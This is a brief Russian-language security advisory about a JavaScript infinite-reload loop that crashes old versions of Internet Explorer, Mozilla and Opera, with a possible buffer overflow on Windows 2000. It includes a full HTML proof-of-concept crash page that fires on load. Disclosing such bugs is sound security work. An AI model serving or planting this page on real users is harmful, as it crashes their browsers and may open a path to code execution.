Возможно создать цикл в JavaScript, который приведет к аварийному завершению работы во многих web-браузерах. 

В некоторых средах (типа IE с Windows 2000) аварийное завершение заканчивается сообщением об переполнении буфера. Т.е. потенциально уязвимость может использоваться для выполнения произвольного кода. 

Уязвимость найдена в Microsoft Internet Explorer 5.01-6.0, Mozilla Browser 0.8-0.9.8, Opera Software Opera Web Browser 5.02 win32-6.0.1win32 

<html>
<head>
<script language=»JavaScript»>
<!—
function crashme () {
var url = document.location
if (document.images) {
location.replace(url);
} else {
location.href = url;
}
crashme ()
}
—>
</script>
</head>
<body onLoad=»crashme ()»>
<center>
<h3>IE Javascript Crash Test</h3>
</center>
</body>
</html>



Оставить мнение